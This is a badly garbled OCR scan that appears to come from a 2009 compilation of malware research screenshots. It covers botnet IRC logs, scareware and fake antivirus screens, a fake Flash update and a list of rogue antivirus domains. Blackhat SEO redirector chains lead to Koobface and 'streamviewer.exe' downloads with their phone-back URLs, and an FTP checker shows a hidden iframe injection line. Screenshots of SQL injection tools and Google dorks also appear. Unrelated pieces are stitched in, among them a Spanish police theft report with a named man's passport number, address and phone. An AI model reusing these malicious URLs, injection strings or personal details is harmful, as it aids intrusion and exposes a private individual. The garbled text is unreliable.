6/2/2009 monthly 
6/2/2009 monthly 


angetreq (+ |nst:prior aa =, 


~i 


nono > 


ooo0c0cf999090009009000 
=" oo > o 
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Tre View evertes Tock Commands Window Het> ay 
A @aO eG 008 08000 G05T3'8 
Dee ae! 


—=————r 7 
USA-@88]1X2eW0h/EMU| has joined 
ITA-@@8|PucT@AB| ITA] has quit IRC (Connection reset by peer) 


=) USA- OBB] SOSUTZ 
USA- SBE] SQsJpal jpery) 
USA~ OBB] SUASUCO| EM] My] 
pi USA- OBB] SuMDNIp | END] 
ITA-@88]d7K2ZPAy|1TAIN| has joined My USA~ OBB] Sy AAZ sec | ery] My 
L-@@@]UZJzEJRc|FROIM) has quit IRC (Ping tineout) USA- SOO] Sz2fhe 190 | CHM] 
A-@@9|UIVYUMOHI TTA] has quit IRC (Connection reset by peer) USA OBB] GAMOQHI | EMM | HM] 
“O00)VTEKT AS |CMU|H) has joined tm USA~ OBB] OF P mg | EMM | HM] 
EGY O88) pOOF Zar ARE IM) has quit IRC (fing tineout) USA~ O80] 6g0G212 | Chu) 
SUM O28] ouSThum| SLU] has quit IRC (Connection reset by peer) USA> BBG] 6GunG Teh | Cra) My) 
A-@@T/OBEYkPy| ITAL ha USA~@OG]S1ehuASK | CHM | Mt] 
888] Qnda6Unbe| SLUM] has quit IRC (Connection reset by peer) USA~ OBB] 6 juxav7 | Cra] My] 
000] kK2NF Irae] CHG |] USA> S08] St g50nI8 | CHM] 
W-@e@@] 7 fanaibK ashy ny USA~ OBB] 6oRKSs0| CHM | Ht] 
1TA-@@@] OOKawiz | ITA, ha USA~ OOO] SPSzaTOT | EMM] HM] 
A-@@@)ourh25P)1TA] has quit IRC (Software caused connection adert) USA~ SOG] GRFLEPAD | Era) | MH) 
SUM-@@@|A6ZHKTK|SLU|M] has quit IRC (Ping tineout) USA> SOB] 6SaZAtA| Era | I] 
FRA- 88] keI_IGGHIFRA, has joined USA~ SOB] ST IOXe9U | EHw | Hy 
1TA-@@@] CUJO6XU2 | ITAL MH) has fod USA~ O00] 6txOICg | EMM | Mt] 
ESP-080)H20urKe JESH|N| has joined USA- @8O| 6uAavATr | EM] 
Fitt-@e@|nphocak|FItiH] has quit 1 tion reset by peer) USA OBB] 6yCwF 7 | Era | My} 
1TA-@80)USHYRsge| TAIN) has joined USA- OBO] PIet 190E | EMM] My 
1TA-@@@/Ciferum|ITAIM] has quit IRC (Connection reset by peer) USA- OBO] P7AMVE Ux | EME | M] 
SUM-@@2|BUBnYyxXcJ|SLU|M] has quit IRC (Ping tineout) USA-@d0| Pa7EStal EM) 
HAU-@28| JDoxdalll |HRU/M] has quit IRC (Ping tineout) USA~ OBB] 764 fib IKY Ere | My] 
USA-@@8|2ppX9y9s|EMU/M] has quit IRC (Software caused connection adert) USA~ SOB] 7CpQRKADL | EM) 
ITA-@@8| y6cFauCUlITAIH) has quit IRC (Ping tineout) USA~ SOB) 7dwghC! | EH | My} 
1TA-@20)DtHE@GS/ITAIM) has foined USA-ObO| 7H2320u0| EMM | HM} 
SUH- O88] Urconend|SLU]H) has ae | USA-ObO] 70x IreA| EMI] My] 
ITA-@@@| kyCUSOUK|ITAIM) has quit 1 tion reset by peer) USA- S88] 7QQKOFSS| EMU) 
1TA-@@0|TkKiNSEL|ITA[H] has joined USA-@BO| 7EFOgKE | EMM] 
ITA-@@8|hAKap7cS|ITAIH) has quit IRC (Connection reset by peer) USA- SOO} 7Uipt7ad | EMU] 
1TA-@2/ELtZ0J3y|1TA} has foined USA-OBO| 7uTHRPAY EM | My] 
11-00) ThFUPAME ITA] has fod USA- OBO] 7XxXi yA | EM | M] 
1TA-@28|LSFGISE/ITAIM] has foined USA- 8B] 7ykAUOY | EMM | NM] 
SWE-@88|uEHs862|SUE|H| has joined USA- 880] 7¥Xy lwo | EMU] 
1TA-@88|CCUCi sus) ITA\H) has fod USA~ SBS) F2kngEO | Ere | My 
1TA-@88|poRsBsL1/1TA| has joined USA- 8G) BAOCEEN| EM) 
ITA-@@8|sWkI6qgo) ITA] has quit IRC tion reset by peer) USA-@80| B8XSSu77 | EMU) Mi) 
FRA-@88| eKtonEV|FRAIM] has quit IRC (Connection reset by peer) USA-OBG| SBRCSUY7 | EM) 
BIN-@88| 190g LDH] BSBIM] has quit IRC (Software caused connection abert) USA- 880] BcAmesed | EN | iM] 
SUH- 888] WH1EQG9|SLUIM] has quit IRC (Connection reset by peer) USA- SOO] BCESAJa| EMM | M4] 
HRU-@88|UGoxAKua|HRUIH] has quit IRC (Ping tineout) USA-8BB| BFSQOgXr | EMU] M] 
1TA-@8@|DEXISKILITTAIM] has quit IRC (Connection reset by peer) USA- S88] BFUqD2c | ENU| 
1TA-@88] @rPOCFNE| ITAL] has quit Ping tineout) USA- GBB] BHKHOAT w| EMU] 
1TA-@@8] IKEJDNOLITAIN] has foi USA-8BB| BKSOw7S [EMU | NM] 
1TA-988| SUFEBYzu) ITA] has quit 1 tware caused connection abort) USA- S88] BkATHgZa| EMU) 
SUM-@88| IpDISBJE|SLU| has joined USA-OB8] BLLunju7 [EMO] My] 
ITA-@@@|KUTHRGC|ITA] has quit IRC (Connection reset by peer) USA- S88] BiMBsVey | EM) M] 
ITA-@@@|MVEQCSE/ITA/H] has quit IRC (Connection reset by peer) USA- 888] BnggoCi S| EMU | My) 
SCO-888/oG@FUDTKISRLIM] has quit IRC (Ping tineout) USA- OBB] BO8eLXIG| EMD | MH] 
HLD-88@|XulesOH| NLD] has quit IRC (Software caused connection abert) USA- GBB] Boreyare | EN | | 
TTA-@8@|COut37 IVI TTAIN) has joined USA-OBB| 8S6zuk2 | EM] 
1TA-@88| UakBZUNG|ITAIH] has joi USA-8BB] Bsqyyshk | EMU] M] 
TTA-@8@| Se@VNZO/ TAH) has joined 800) 8UdngPas EMM 
SUN-@88|P3MKpToO|SLU(M] has joined 5 800) BWiywyly | EM] 
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Ba ERSONAL i 


Personal correspondence 

Service guarantees delivery of your 
letters to ladys you have written, quickly 
and efficiently. After your letter gets to 
the Lady's malibox we contact the lady 
and invite her to come to our agency to 
pick up your letter already translated for 
her. 


From $6.95 Buse Us 


PHOTO 


CREDITS 


Photo services 
You may use photo-credits to send 
personal photos to a lady or receive the 


photos that she sends specially for you. 


Flowers 


Toys and Chocolates 
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VIDEO > 
CREDITS 


> — wlll 


Video services 
With this service you can watch videos 
of ladies. 


From $4.80 Bulag is 


Language lessons 


23187 


23188 


[Up Gonerattst co Cotatunya , 6s.co 
Departament ior, - n> 


nha 


~ thos 


do Seguretet Cirtedenn 


be 


tent ei 


| 


Diligencies numero: 289503/2009 AT USCPRATLL 
Horaidata: 06:18 hores dal dia 18 d’abril de 2009 


Instructoria: Mosso del cos de Mossos d'Esquadra, amb TIP 13706 
Secretari/aria: Mosso del cos de Mossos d'Esquadra, amb TIP 


13573 


COMPAREIXENGA A Prat de Liobregat, a les 06:18 hores del dia 
18 d'abril de 2009, i davant d'aquesta instruccid 

COMPAREIX 

Qui acredita ser Karunanitih PONNAN nascut e! dia 12 de mar¢ de 
1957 a INDIA (india), fill de Ponnan i dé . amb Passaport 
(india) nimero E9164679; amb domicili a IRUMBULIYUE, nim. 59 
KURINJI nagar (india) i telefon 91 44 22398116 


MANIFESTA 

_Que el Sr. PONNAN se presenta en esta instruccién para denuncir 
los siguientes hechos: P 

Que ei Sr. PONNAN trabaja como iripulacion de barco. 

Que se encontraba en el aeropuerto de el Prat de Lilobregat en 
Barcelona para coger un vuelo de regreso a su pais, India. 

Que sobre las 05:45 horas _ del dia de hoy se encontraba en la 
terminal B, frente a BRITISH AIRWAYS comprovando la hora de 
salida de su vuelo. 

Que en ese momento alguien se ha hacercado por detras y le ha 
cogido la maleta en la que tenia suspertenencias. 

..Que no ha podido ver a la persona que le ha cogido la maicta, 

_Que $6 trataba de una maleta de color negro de marca JEEP. 

_.Que en su interior tenia: 

-un (1) ordenador portatil marca HP valorado en 750 dolares. 

- un (1) Cd para ordenador con un software especifico para el barco 
donde trabaja. 

- cuatro mil quinientos (4500) dolares en efectivo. 

- documentacién varia relativa al barco donde trabaja, tipo contrato, 


acreditacién para trabajar en otros barcos, etc. 
Que ha sido informado de los derechos que le son propios, 


mediante acta independiente. 

Que no tienen nada mas a decir | firman esta comparecencia en 
pruava de conformidad las personas que han intervenido, a las 
06:40 hores de! dia 18 d'abril de 2009. 


Perqué consti ho certifico. 
q NX. 
C7 iY 2 
yarn a 
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rg My computer 


To help protect your computer, Windows Web Security 
System Tasks ' have detected Trojans and ready to remove them. 


[a) View system informaton 
© Add or remove programs Detected spyware and adware on your computer: Filename: 
GB change a settings @ Trojan Horse IRC/Backdoor.Sd8ot4.FRV ALCWZRD.2XE a 
@ Trojan Horse Generic 1.093 d3dx10_37.dl 
= @ W32.8enjamin.worm dovacn.dl 
Gag teed drive (C2) @ Adware.win32.Look2me.ab iesetup.@t 
@ 10 Viruses found | @ Advware.Hotbar atméd.dt 4) 


Spyware is software, which can gather information from user's computer 
throught Internet commection and send them to its creater. Gather 
information can be passwords, e-mail adresses and all that data, which is 
important for you. 


Name 
© Trojan Horse IRC/Backdoor.SdBot4.FRV 
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om/ko-yong-hui him 


om/eminem-bruno-fa 
om/men-y¥s-wild-fi 
: olly-steele html 
om/447-victims htm 
om/frenchopenco 


om/bruno-trailer him 


om/melissa-joan-ha 


om/sandra-boss- 
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9 20-weorld D 


om/arligh-ravage. him 


om/sims 
ornvde 

DIT a a 
om/david-o 
’ P.5-Sile a 
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20 
21 
22 
23 
24 
25 
26 
27 
28 
2 
1) 
31 
32 
33 
34 
35 
B3) 


nnnewsU9.is- om/S9com-psp_ htm 


paymentonlinesystem .com 
livewwwupdates .com 
liveinternetupdates .com 
livesecurityupdate .com 
securitysoftwarepayments .com 
antiviruspaymentsystem .com 
systemsecurityupdates .com 
networksecurityadvice .com 
systeminternetupdates .com 
protectionsystemupdates .com 
updateinternetserver2 .com 
protectionupdates2 .com 
proantivirusscannerv2 .com 
proantivirusscanv2 .com 
powerantivirusscanv2 .com 


2322 


com/madden-2010 html 
ornrvied on-james-so pe 
e html 


om/annie-bierman, htm 


om/manana-es-para-sie 


om/nadal-girlfend htm 

arm-up-match html 
om/heidi-montag. htm 
om/david-garrett-violinis 
om/earth-2100-abe him 
: 0 p-ha per-Dase 


omévictims-of-flight-44 
om/benign-growth-in- 
om/sean-goldman. him 
om/bam-margera-divorce 
om/david-carridine. him 


-fat html 
om/boise- p-uniforms 


ey html 


him 


ball html 


om/kristen-stewart-boyfrie 


om/ortega-henderson-pi 


htm! 


- 2009 him 


ors html 


6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2003 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2003 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 


wn slastmod |¥ )nst:changetreq |y |ns sporty y 
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2009 Best AntiMalware/ Adware removal 
efficiency. 


The most efficient software for malware, adware and spyware removal and further protection of your P¢ 


100% _ 


“975% 


ency 


EF Fic 


Virus Kaspersky F-Secure ESET Webroot BitDefender Norton 
Shield Anti-Virus Anti-Virus Nod32 Antivirus Antivirus Antivirus 
2009 
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System Tasks System scan progress 


[2) View system information 


DS Add of remove programs @« 5 
> Change a settings 

Hard drives 
Other Places 

xp Local Disk (C:) x9 Local Disk (Dz) 
©) My Network Places © 346 trojans @ 142 trojans 
&)} My Doasnents DvD 
© Shared Doaments 
GB Control Pane! (e) 

\. DVD-RAM Orive (E:) 


Windows Security Alert 


] Tohelp protect your computer, Windows Web Security has 
t ‘ 


. detected trojans and ready to rernove them. 


Detected spyware and adware on your computer: Filenaene: 


Date Files infected State & 

F Admess.Trojan tepservie2.exe 3 11. 18.2008 35 Watng renoval @ 
© zserv. Transponder. Trojan Perv. 11.18.2008 35 Waiting removal 

(a heen oheaeseal — 11.18.2008 35 Weitng removal 5 


Spyware is software, a re ee ee 
Irtemet connection and send them to ts crestor. Gathered information can 
passwords, mad actresses and al that dota, which s iaportant for you. 


[1075] 
23194 


Your Purchase is Backed By Fully Secure & Encrypted Your Email Address and 
Our 30-DayMoney Back Ordering - Even Safer Personal Information are 
Guarantee! Than Over the Phone. private and NEVER resold. 


Thank you. Your transaction has been accepted. 


PLEASE PRINT! 
Thank you for the recent purchase Antivirus 360 software. 


THIS IS A ONE-TIME CHARGE. 

Product/Service ordered: License for Antivirus 360 

This charge will appear on your card statement as CHRPay.com/ducforceide 
ACTIVATION INFORMATION: 


Registration e-mail: 
Registration key: 


To register, start Antivirus 360 and cick on Registration button. 
Please enter your registration e-mail and registration key to activate software. 


Sincerely, 
Customer Support 
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—a" == 
2 Science News | Science & Technology | Technology Mews - fOXMews.com - Microvaft ieternet Lxplerer 


. « |x) cA 
oO» >) it} 2) eae W Personal Antivirus 


Adirees 9B) beta: tcarewes comfsctect fedex 


Personal 


TRAVELER 


Fle Mame ReaRItecnon 

GB C:Prog am Piet\Common Plecrosolt Pared... Infected: WI2 Downad.p.C - Worm 

GB Crogan Pied\Common Piertisoupifinarietim .. Infected: WIZ Cowned.p.C - Worm 

BC: Prog am Fées\Common Files Systerlacojmesd Infected: Suspmious. Marat - Troan, Virus 
Gh Ci Progam FletiCommon FlesiSysterimeak\es... Infected WI2 Parsee. - Virus 

BC Prog om Fles\Common Filesl Systemprsek es Wtected: Explot-TaroOrop.g > Explot 


Ee eal CB 7 Noe nrw am Chest mene Chas Carhaml te Pirie nbartat bind Adtran Ut? Hida . Gn 


SCITECH leonae 


Cosmic 


HOW GREEN? 
1 ewuto(s) % seconds) 
TECH TUESDAY n Ci Ceca Cesk) 
C/(WINDOWSipyiten ci nbcbase.ean 
ARCHAEOLOGY 


CYBERSEOURITY 
VOUUTION AND 


DAI Coated fae 


@) bore 
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7 —_ eS =~ a - 
Kyeunk tore. tap | Satetme | Terrain 
| 8 
a q ny . 


Varziner StraBe 127 
44369 Dortmund, Germany 


Get directions - Search nearby f 
Zoom here - Save to My Maps -Send ff 
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BOT, 
GB Momworerencrai © Home © Remove Win PC Deterter © FAQs © Support QDOWNLOAD NOW 
rw ADWARE & Via 


v | Click Scan & MalwareRemoval 
v¥ Quick Scan Technology 
v¥ 100% Safe and Secure 


Free Download 


Advanced features: 


Reot-Level Removal of WinPC 
~ = Detender 


Powerful Smart-Scan 


| Scan, Remove & Prevent 


= | Why Malware Removal Bot? 


Malware Remov alti OT 158 of Completely Removes 


4; uM Win C Detender Y = Heurtstes 
4 Matware from Completely Deletes Malware, 
ve & Regastry ~ Adware & Spyware 
Intuitive Single-Click Controts 
Disables Harmful Programe 
Built in Backup and Restore 
Preverts System Skrwdown Boosts System Speed & 
Performarce 
: Stops Matcious Programe from 
Ticantaeneeaticiainte Y Running on Swrtup 
Includes: 
_ Delete WinPCDefender and Remove Malware Ae eaTe 
5 Get protection from the latest online threats. The scammers behind Win PC Defender will stop at Free 24/7 Technical Support 
22 nothing when it comes to tricking you What's worse that rogue programs Ske this often dom travel 
ms = alone, but instead are ferried by clardestine Trojans, agents that pall Spyware and Adware on your Minimum Requirements: 
c.> system, There's no doutt ttt the work! of malicious software has grown complicated and powerful But 1ooMMz P 
Swnkfully. MateareRemovaiB OT proves you with a way to combat the most serious dangers. 


Wirdiows 08, ME, XP, 2000 - 
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Advanced Search 
Language Tools 


internet security 

internet security 2010 

internet security 2010 virus 
internet security 2010 removal 


internet security software 

internet security 2010 malware 
internet security software comparison 
internet security free download 
internet security ratings 

internet security 2010 reviews 

internet security 2010 scam 


| Google Search | I'm Feeling Lucky | 


[1080] 
[a} View system information is 
@D Add or remove programs Oct 4 = 
GC Change a settings 
Hard drives 


Other Places 


xp Local Disk (C:) i) 


» My Network Places File Download - Security Warning 


) My Documents 
Oo Shared Documents 
@ Conrrel Pane 


Do you want to run of save this file? 


Windows Security Alert 


Bo help protect your computer, Windows Web Security has 
\ » 


detected trojans and ready to remove them. 


While files from the litemnet can be useful, this file type can 
hally haem your computer. If you do not thust the source, do not 
fun ce save thet software. What's the isk? 


Detected spyware and adware on your comeeter: Flename: 


(7) Admess. Trojan 
@) zserv.Transponder.Trojan 
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These blackhat SEO-ers have been actively multitasking during the past couple of months. 
For instance, another campaign maintained by them at Lycos Tripod’s is-the-boss.com is 
using the redirector ntlligent .info/tds/in.cgi?11 &seoref= &parameter= $keyword &se= $se 
&ur=1 &HTTP REFERER= (72.232.163.171), hosted by Layered Technologies, Inc., in order to 
serve a a [5]Koobface sample located at 91.212.65.35/view/1/1416/0, which upon execution 
phones back to upr15may .com/achcheck.php; upr15may .com/Id/gen.php (119.110.107.137) 
as well as to i-site .ph/1/6244.exe; i-site .ph/1/nfr.exe with the second binary phoning back to 
85.13.236 .154/v50/?v=71 &s=| &uid=1824245000 &p=14160 &ip= &q=. 


2323 
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de ec tory 


ch 
t chang 
change j . a i uch File or directory 


Terminated 


Vaid FTP Valid Socks 
srvodess 19@64.111.20 : 4/182.45 184:1039 
Rpsiiepc §= dew -travel.com 
Rp-jipar § jeheine imedia-mneistet 
Ftpsffivz:;  sky@srr spo.ru: 
Rp:jfrole geheiné v.tmuielectroni e: 
Rtp:iisw = TWK200 telegrid,ru 
Rpciider  derbyae 6.85.80: 
Rtp:{flapc = cen:BLa2 A7Gfip.caoxme wt 


Rp:ifue herd ¥.ikors.de: 
Ftp:j/akti = stiak37s an tkors..de: 
fep:iiivE 3O-WEB  jYbhttUOW@E —_—*).97.13: zi 


Show log threads# | 13] vow _| Treads ruin row li 
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FTPChecker 


81.103.9 247:1032 
82.46.10 224:4013 


82.37.19 170:1131 


ftp:fit hameister:tiz sca. iors: 


net: 
nics.de: 
er.net: 
961.20.97.13: 
a5us.1et: 
-suttionsh: 
Number ofthe ndtag col 
Uweod [ebody> <frame src= "hittp://: " wicth="0" height="0" style="display:none”> </iframe> Version 
[+0 mx ot eee | 1.0.0.0 
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Oolions | Window's | Suslem Info | Aboul | NelSlal | : 
Connect Control =| Control 2 | Files | Processes | Reaisiry | Slalus: 


Connection Io serve Nol connected. 


IP: Port: Password: 
—:-{16661 —{_connect_|—PASSWRD 7 xy 


j File buffer, %: 100 


Porl Scanne 


IP range 4-311 Alam 
maz) UID fo 
me 


ee 
IP PORT Doubleclick fo Las{ Action: 


sel ip and pol. 


lyousite.com 


save ip and porl 
refresh | 
ae 


._: prodex Team :¢ 
TEE 
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Search by Tweet Keywords (Target interests, etc) 
Keyword | (Search) (— Stop) 


Search by Bio Keywords (Target interests, etc) 
12185 Followers Keywoed (Search) (__ Stop) 
ToDo Search Users by Location (Within Distance of Zip Code) 
37789 Users To Follow Dpcotee = t—“(i‘éséséC é*S earth L CStOD CS 
$89 To Folllow Back @10Mées (O25 Miles (50 Miles (100 Miles 


Last 7 Days os] Search by followers of another user: 
46498 Follows Sent Username ( Search ) ( Stop ) 
15334 Followers y > ——_——~ 


oo 98 © 


2670 = Followers Lost Search users followed noth 
33.98% Conversion Rate ~- & ¥ ae 

Messages Sent Username ( Search ) ( Sop) 
° Twitter Updates eS 
(Refresh) (History) ‘Sear cutnent “Whe to Foliow” list 


Status 


ALIA DIYS 
AVVANRLS Followers List Dovertioaded Successfully ~ 121212 AM 
2009 Following List Downloaded Successfully ~ 11:12:32 AM 


Finished loading account data ~ 11:12:32 AM 


Cortor’s Gece 
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My Fake The Onginal 


Ff ADOBE" FLASH” PLAYER Ff ADOBE® FLASH® PLAYER 


23208 


An update to your Adobe Flash Player is avaible 
Flash Player enbances you Web teowsing experience 

Thas update inelades: 

Read sod the 


you updute notificatnrs, Chek 


Updating take under 4 mensate om broadband, no restart is reqaered 


An update to\vour Adobe Flash Plaver is available 
ae ee Po 


This epdate inctuces: 


© Searty errercements desgited i is Feo”) f.! etn 


Reed — ik Bix dundate e969 te End eer Liceme Acreement To penge or 
dinebte you wodete Hobcebo*s Che bene 


Updating tates under 2 murute on Broadband, no restart 1s required 


Remind Me Late | __Deeit instal | 


. 


a] 
vaq 


NZ 


2s 


olla ll alas)! a... 


ee a 
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ite http ffewe. google. en/ etvanced_sew ch? q@inarl : aspS3Fi dkiDanue=100hconplete=lahl=rh-CBaly=lang frénewwindow=l@as_qdr=all a $955) | fut | BORK | RB | The | 
] a 7s | 
_ RF a= 
OO e BRMR REMB | Goole AS a + http://w iywu. con/y. asp7id22459 4 
a t ttp //www wits. fr/_hiver/tarifs_et 
SM: Atty fee yaolhine. org/interne, asp? 
- SS: Attp://wwe ps. ch/bersseries/dossi« 
y [ 7 rm | + tip /fewe sbelee be/news detail. ax 
mR PEUTRBNS A  inut EE * 100 ASR =) 4 t http://www nscher_ con/JEUL/detail 
. | S http //www ver. ca/main asp7idell4 
HEU T HRSA Google Lada a TAttp //www vel. net/home, asp7i d=3058 
ML: Atty //eee vari age com/index. asp7id 
REED—tT NFB 7 Rttps/fwwe “sciences. com/Register 
At Attp://shep com/Cat_Browse. asp?id=i! 
y | a S https //sewe itVecanale. asp?ide116 
FOBT SA - mtn: http://www 1 com/pages/ouvrages/ fic 
7 i http //www vas, fr/ligne_ville. asp7i 
ae PHM Mit ae HZ 7 - SSM: bttp //pe. *fra/bie. asp7id=50 
+ Attp //wew ve, be/iedex, asp?IDE114 
ER PHMANS RT: Eee Rm 7 m http://www souteslesbeautes. con/fle 
Ses Se a D http //ewe ~universe. com/fiche_act 
wie g + PMR aeteeM | Eee tert “| a i ttp //prej wnesse con/defwalt. asp?i 
_— siitealcg sass OM: Atty Sere wsource cndp, fr/selecther 
AM BEET RA M A ft et(0) al | ¥ 
SaAKe Binriges MNhMeelen ~! a Is a 
$13 TMIM | Leiba | 9 STHut | | 
RAIMIM | eR | 
Es. 1 Lc MeL ard RERETS HASH EAR RS || NR res 
bttp://ine shet-jeunes. org/entretien 14281 ———y aMD S=8 + oD S=3 AND RFH tM Les entretions de F 
bttps/ fee shet-jeunes, org/bibrech. a: 12904 —, aD S=8+ aMDG=3 AMD RFH +i les bibliographies 
https //wwe org/resources/infodetail. 2797 —— SRIRRARF : varchar va AND SFR = wssatServer CRIM - Child Rights S0040«: 
https //wwe com/poflesh/ gala asp7id=1 S163 = "am e='8 + D's AND xe +a EYSO - The European 
Attps/ swe race. qc. ca/index. asp7i d=4« 5843 ——— aD SS + MD S=3 AND BF Access patinage 800404; 
http //wwe a. org/DetaidArt_Art, asp7]; ST34 f =S eC] aD SS + aD SF AND RFR WSSOiServer Anjou Online - Entr DOW 
https //ewe i. com/fo/page asp?id=109 872 zz aD SS + aD S=3 = AMD RE +H TFACI - Audit inter 
http) //www or. fr/irnen/detail_unites. 3250 fT aD SS + all G3 ASD RFR RM Dheacute: tail Unité SOW 
http://www qc. ca/pages. asp?id=139 6343 | aD SS + aMD G3 = AMD RF AFA Fcug S0040ei 
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Heth: [http:/fewe. google en/seureh?as_q=inurl KIA aspKiFi dXID* and inti tl eRIAKESROSKACKESISPREGA compl ete=14hI=eh-CWAnewindow=LAnua=1C ©] S03) Aik | ORK | GIB | ist 
ae | 


ze * 


MAR Hk 28 AR BH ME ES vy 
[inutl..asp?id= and intitle: 8 ' : _ pec preg 


Google pay ’ ean asp7i d=T628 
CRAAN PRAM CMEPRAN CF 


sh. confaceshon 1 Gz. oy asp?s d=S93eeni d-4clasanene= 
PAS $913,900 000477 inurl; asp7id= and intitle: MNRMAR, LF: 


job. net/enployee/showjebsinfo. asp?i d2093 
on/Shep/Eol, asp?i d>X27 
tina, com/about. asp7i d=! 
tha com/C¥/ show. asp?i4=112T 
}. com/comp/ content. asp7i de34300 

om. co prodects_list. asp7id=1 
edu, co/viewnews. asp7id=1577 
HS voxue. coa/ school. asp?i4=38T3 
tape rn } i. com/ oo. asp?i GeB652 
ZReERS MAG mp. gemfahon product. anp?i e542 
SMHERS EA —POLAERSRANAR: RAMRLAM. RO MMi » ca/CManr o/AA shornens. asp7t 118 


LN). RAMTEC. ROME HSS. RAMEN. + ralkorset/ detail. axp?i 2046 
aT a 


com/ sfbx/ xftr. asp? d=78 

i, com/eomtract/show, asp?id=283 
werw.cg iGO. com/userweb/company asp7id=55442 - 22k - 
PUA - HAMA 


MER: TARE MR". RESTS aT. 


ree. com en/coimdex. asp?ID=131 
th). on/ index, asp?i dei7S3 


Ph fit) | 1. iba Q. SRTHut 


REMI MS BAGS | 

Rane aR RE ABR TARR BSS Ripe Poet) pad 
Attp/ swe. en/infe. asp?ide6 1609 a aD 69S + AND OHS )=—AMD ath a RBALAA A A 
Attps//ewe, sbartech con/shownews. asp? S231 —=——== WD 8S + DSS 8 AMD RFtH +a PRBRAAARAt 
Attpo//wwe. sbartech con/PreductShow. « 6796 — == O05 + aD G3 =A WIM +a PRRREAAR AE 
Bttp J sire ve com/sinonews/List, asp?i 433 ———_——, 0 8-3 + aD G3 AND RP +i TRAMBMRBAR A? s0040021,: 
Attp://we, gov. cn/qynl/corporation» 2672 — =) a 8S + aM G=3 = AMD REM +e Pee FEE CEM 60040021, : 
Bttp://swe, com/OOswn/li st. asp?id=6¢ 4810 = wes + aM 3 | AMD Rh +a LSREC RAH 
Rttp:/ fie. _ com. en/products list. as; 4781 ——_—s o8D 8-8 + aD G3 8 8=6AMD RTH +A PeSRMAE ( THdH : 80040e21,: 
Rttpo/ swe. iba com/C¥/show. asp?id=11i S078 = eiie=8 ¢ aiDE=3 AND Fh Aa RHA A 
Mttp://de « con/rfbe/rinr. asp?id=78 SIS ———= Yeh O23 + XR GB NOR ath a PRET RH Aa 
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MR Gt 28 Ah BH ME ES v 


Google 


S03 | Fuk | OOK | GIB | Hist | 


ixun. co school_show. asp?id=a290 

» cn/company/ shew. axp?i d=TE2S 

sh. Sy open aie asp?s d=S93#eni d-4classnane= 
job. mat/cunlereds: a asp? d2693 


inurl aspid= and intdle: 48) 4 
CRAAN PRAM CMEPRAM © F 


PAS £990 13,900 000-477 Binurl:.asp7id= and intitle:A MA RMAM, LF: 


MER: RMT MR". 


SMAERSRA-ROUMERSRGMKA: RAMS. Re wit 
RR AMIE. RVRPHHSH. RARSEHRA. + 


fateH. 


. oR. 
www.cgI60. com/userweb/company asp?id=55442 - 22k - 


2a 


ih. . . .. 


PURER - RAS 


J =| TL frutiaas | 9 mit | 


RESTS aHtih. 


Bol. asp?id-27 
tins. com/about asp7ad=l 
the com/CW/ show. asp?id=112T 
}. com/comp/ content, asp7i 


i. com/ co. axp?i 
wp. coa/show_product, asp?i d=-S42 
ca/tihenr o/4A. shounone asp7ie1is 
com. caf about 6. asp?id=33 

salker. net/detail. asp7i de206 


com sfbx/sftr. asp7i 
i, com/eomtract/ shor. « 
ree. com. en/coindex. asp’ 
thj. on/ index. asp?i dei7S3 


i com. co products_list. asp7id=l 
edu. col vi ewnews. asp7id=1577 
voxue. coa/ school. axp?i 43873 


78 


Pi d=283 
131 


MA BGR | 

Rae Me REMIT ABR TARR RSS 
Attp: //wwe en/info. asp?ide6 1609 a OD oS + AMD SHS) AMD Oath a REALAT A A 
Attps//wew, sbertech con/shownews. asp? 5281 ——=== DoS + aD SS = AND RtH +a PRRRAANR A 
Bttp: / wwe, ‘bartech. con/PreductShow. « 6796 = DoS + a S3 8AM WIM +A PRRRIEAARAt 
Bttpo//wwe, ve com/sinonews/List, asp?i 438 — === 0 8-3 + aD G3 AND RH +a TPM BPR AE 80040021,: 
Attp://wwe, gov. cn/qyml/ corporation» 2672 a woes + aD E3 | AD RM | Aa BAe FE CLAP 0040e21,: 
Bttp:/ free. com/OOswn/ list. axp?id=6¢ 4610 zz woes + a G3 | AMD RH +a LSRECARAH 
Attp://ewe. -_ com. ex/products_list. ay 4781 —— 08-3 + aM e=3 | AMD BH a PMMA C Titi 2 cO0ee21,: 
Attp://wone, tha com/C¥/ show. asp?id=11i S078 i” eG=8 ¢ NDO=3 axD Sth AAA RHA A 
Attp://ae « con/rfbe/rinr. asp?id=78 SiS =z Mek 853 + XoR OB LOR be oS | PRERRHAa- 
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rn B20 cee! 
Home Videos Channels Community 
viseos 3] SeaaeT) sce _aesoed 
17 | From: Jerry 
| dil : Jones 7 moet 39° 
a ee eos 12 
Relative movies. 
Une! 
Kkkke 
Mike 
KKKKK 
ft Andrew 
Share WFavorite Add to Playlist 
Rating: & kkk Views: 122323 Length: 30:46 y KKKKK 
Video Responses (view all resoonses Corey 
kkk 
User comments. 
Alex Tylor 
0 Kkkkk 
She Gan) he Mat cur im her tace ome bat a 
Eve ts a goddess i Tvior x 


oe of he best bods in the bin shes a tea 


Another campaign maintained by them at is-the-boss.com is using three redirectors 
kurinah.freehostia .com/in.cgi?8 &seoref= &parameter= $keyword &se= &ur=1 GHTTP 
_REFERER=; promodomain .info/in.cgi?8 &seoref= &parameter= $keyword &se= &ur=1 
&HTTP _REFERER= - 66.40.52.63 - Email: support@ruler-domains.com and thetrafficcontrol 
-net/in.cgi?8 &seoref= &parameter= $keyword &Se= &ur=1 GHTTP_REFERER=, until the user 
is finally redirected to a fake PornTube portal big-tube-list .com/teens/xmovie.php?id=45048 
- 216.240.143.7 - isaacdonn@gmail.com where malware is served from my-exe-profile 
.com/[6]streamviewer.45048.exe - 66.197.171.6 - Email: michalevd@gmail.com. 


Upon execution, streamviewer phones back to reportsystem32 .com/senm.php?data= - 
